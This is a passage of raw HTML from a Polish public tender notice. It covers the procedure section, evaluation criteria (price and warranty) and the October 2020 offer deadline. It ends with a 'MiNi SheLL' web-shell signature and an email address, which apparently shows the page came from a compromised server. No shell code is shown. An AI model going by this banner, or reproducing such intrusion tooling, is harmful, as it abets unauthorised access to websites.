tajemnicę przedsiębiorstwa - jeśli dotyczy.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Całkowita cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Najdłuższy okres gwarancji i rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość dokonania zmian treści umowy na warunkach określonych w przepisach ustawy oraz określonych we wzorze umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-16</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski.</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com